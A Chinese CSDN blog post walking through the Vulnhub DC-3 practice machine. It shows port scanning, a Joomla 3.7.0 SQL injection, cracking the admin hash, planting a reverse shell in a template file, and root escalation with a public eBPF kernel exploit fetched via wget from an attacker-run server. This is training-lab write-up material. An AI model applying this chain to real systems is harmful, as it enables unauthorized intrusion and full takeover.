内网渗透DC-3靶场通关

最新推荐文章于 2024-05-20 02:07:36 发布
最新推荐文章于 2024-05-20 02:07:36 发布
阅读量882 收藏
点赞数
分类专栏: 技术分享总结 渗透测试 文章标签: 渗透测试 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35664104/article/details/120438549
版权

个人博客:点我

DC系列共9个靶场,本次来试玩一下DC-3,只有1个flag,下载地址

下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。

IP

kali : 192.168.31.17
win7 : 192.168.31.168
dc-3 : 192.168.31.241

渗透

传统艺能端口扫描

nmap -sV -A -p- 192.168.31.241

在这里插入图片描述

cmd为joomla的,且只开放了80端口,使用joomscan 再扫一下发现了具体版本为 3.7.0,发现后台地址为/administrator。
在这里插入图片描述

再使用御剑扫描一下没有发现更多有用的信息。
因为开放了80端口登上去看一下
在这里插入图片描述

作者告诉我们只有一个入口可以进入后台,只有一个flag,需要root权限才可以读取。再看一下后台登录,尝试弱密码登录失败,(burp爆破应该是可以的)。但因为是joomla的CMS而且版本为3.7,我们尝试搜索一下他的漏洞。

searchexploit joomla 3.7

使用第一个sql注入的漏洞,直接将这个php下载下来在本地搭建一下登上去,输入target即可爆出一些信息,包括后台登录账号和密码的hash。
在这里插入图片描述

将admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu 写入pass.txt进行破解

john --show pass.txt

得到密码为snoopy,登录上去之后发现templates板块可以修改模板beez3(或者另外一个)的源码,先写入phpinfo然后找一下他的路径,在192.168.31.241/templates/beez3/下,然后直接将index.php反弹shell或者一句话木马。
在这里插入图片描述

连接上后登录用户是www-data。

提权

由于只有root可以看到flag,因此需要提权。先看下内核是否存在内核漏洞

lsb_release -a

内核为ubuntu 16.04,查询其漏洞,使用39772.txt,查看其文档说明。部分内容如下:

An exploit that puts all this together is in exploit.tar. Usage:

	user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
	user@host:~/ebpf_mapfd_doubleput$ ./doubleput
	starting writev
	woohoo, got pointer reuse
	writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
	suid file detected, launching rootshell...
	we have root privs now...
	root@host:~/ebpf_mapfd_doubleput# id
	uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

	This exploit was tested on a Ubuntu 16.04 Desktop system.
	
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

根据文档说明,需要将下载下来的39772.zip中的exploit中的所有文件传到目标靶机然后顺次执行compile.sh和doubleput即可。

python -m http.server 80		 #python3开启服务器
python -m SimpleHTTPServer 80    #python2开启服务器

#靶机
cd /tmp
wget http://192.168.31.168/compile.sh
wget http://192.168.31.168/doubleput.c
wget http://192.168.31.168/hello.c
wget http://192.168.31.168/suidhelper.c
chmod +x compile.sh
./compile.sh
./doubleput
whoami

最后在/root下找到the-flag.txt。

总结

整个渗透、提权过程完全是利用到了joomla 3.7 这个CMS的版本漏洞,提示我们使用开源的CMS一定要及时更新版本和做好防护。

xzajyjs
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透测试-外链.pdf
05-04
内网渗透测试-外链.pdf
内网渗透专用-mimikatz
05-06
内网渗透网络安全领域中的一个关键话题,主要涉及在企业内部网络中进行合法的安全测试或非法的攻击行为。"mimikatz"是一款著名的开源工具,由法国安全研究员Benjamin Delpy开发,用于提取Windows操作系统中的明文...
内网渗透DC-1靶场通关(CTF)
qq_35664104的博客
08-12 1311
最新博客见我的个人博客地址 DC系列共9个靶场,本次来试玩一下DC-1,共有5个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 首先在kali中扫一下目标ip arp-scan -l 通过排除,发现目标ip为:192.168.0.119 经典套路,nmap扫一把 nmap -sS -sV 192.168.0.119 发现目标开启80和22端口 我们先看一下他的
vulnhub靶场实战系列-DC-3实战
最新发布
weixin_45221204的博客
05-20 979
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将介绍dc-3靶机渗透测试,内容包括nmap扫描、Joomla SQL 注入、john密码破解、linux内核提权等内容。使用nmap进行主机发现和端口扫描使用joomscan目录扫描使用sqlmp进行sql注入获得用户信息使用john进行密码爆破登录管理页面上传shell脚本linux内核提权,并获得flag。
内网渗透DC-5靶场通关
qq_35664104的博客
10-12 2407
个人博客地址:点我 DC系列共9个靶场,本次来试玩一下一个 DC-5,只有一个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP DC-5: 192.168.31.107 Kali: 192.168.31.18 Win7: 192.168.31.168 信息搜集 首先是主机发现,得到靶机ip arp-scan -l 对其进行端口扫描,开放了80、111
内网渗透DC-4靶场通关
qq_35664104的博客
09-25 677
个人博客:点我 DC系列共9个靶场,本次来试玩一下DC-4,只有一个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP DC-4: 192.168.31.176 Kali: 192.168.31.17 Win7: 192.168.31.168 信息搜集 首先是主机发现,得到靶机ip arp-scan -l 对其进行端口扫描,开放了80、22、4444
内网渗透DC-2靶场通关(CTF)
qq_35664104的博客
08-25 701
为了更好的阅读体验,请在pc端打开我的个人博客 DC系列共9个靶场,本次来试玩一下DC-2,共有5个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 传统艺能,kali扫一扫,发现目标ip:192.168.31.198 arp-scan -l nmap扫一把 nmap -sV -A -p- 192.168.31.198 发现开放了80(http)和7744(ssh)
Vulnhub内网渗透DC-7靶场通关
qq_35664104的博客
09-01 667
个人博客:DC系列共9个靶场,本次来试玩一下一个 DC-7,。下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。M1请使用UTM进行搭建,教程。
Vulnhub内网渗透DC-6靶场通关
qq_35664104的博客
08-30 187
个人博客。
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3592
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1120
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-1靶场通关详解
qq_30889301的博客
05-20 177
dc-1入门教程
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
内网渗透测试-提权工具
05-25
内网渗透测试是信息安全领域中的一个重要环节,主要目的是模拟黑客攻击行为,以发现并修复组织内部网络中的安全漏洞。在这个过程中,提权是关键的一环,它指的是在获取了低权限账户后,尝试升级到管理员权限,从而...
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在...
虚拟机Parallels Desktop 17 (PD17)支持M1 自己动手制作启动器解锁
热门推荐
qq_35664104的博客
09-18 1万+
具体看我的个人博客:xzajyjs.cn 如果自己有能力的话,直接查看这个视频即可。点此 前段时间刚出pd17,作为mac上最最强(没有之一)的虚拟机,版本17更是更进一步,性能提升极大,更是支持了Monterey和Win11,图形显示能力提升巨大,尤其对于M1来说。逛了一圈某宝,所有pd17的破解版都不是tnt,而是利用启动器,但居然要卖到二三十块,现在就来解密所谓启动器的原理和自己动手如何制作。 如果打开有障碍的话请接着往下看。(这里使用BigSur11.5.1做演示) 首先彻底退出pd17。接着打开
Xray安全评估工具使用
qq_35664104的博客
01-18 1万+
xray 是一款功能强大的安全评估工具,主要特性有: 检测速度快。发包速度快; 漏洞检测算法高效。 支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。 高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以极大的客制化功能。 安全无威胁。xray 定位为一款安全辅助评估工具,而不是攻击工具,内置的所有 payload 和 poc 均为无害化检查。 这里介绍一下xray的简单使用及各种联动 1. 使用基础爬虫爬取并对爬取的链接进行漏洞扫描
mac QT-creator qmake后运行未响应、SDK版本过高报错解决
qq_35664104的博客
11-22 1万+
最近在玩QT,在win上一切良好,但到了我的mac就各种水土不服。尤其是利用qt creater跑qmake根本就跑不通。 疯狂报错,根据提示信息应该是我的SDK版本太高了,(都怪我xcode升的太勤),qmake项目构建后运行起来直接未响应 查了国内外的一些论坛,都说不出个所以然,要不就是让降SDK版本,要不就是删除什么qmake.stash(而且这个好像没用),都太麻烦。最后还是查了qt的官方文档才得到的答案 官方文档 根据文档所说,由于SDK版本造成的qmake问题,可以在pro文件中加入如下这条
内网渗透--ICMP隧道
05-16
对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值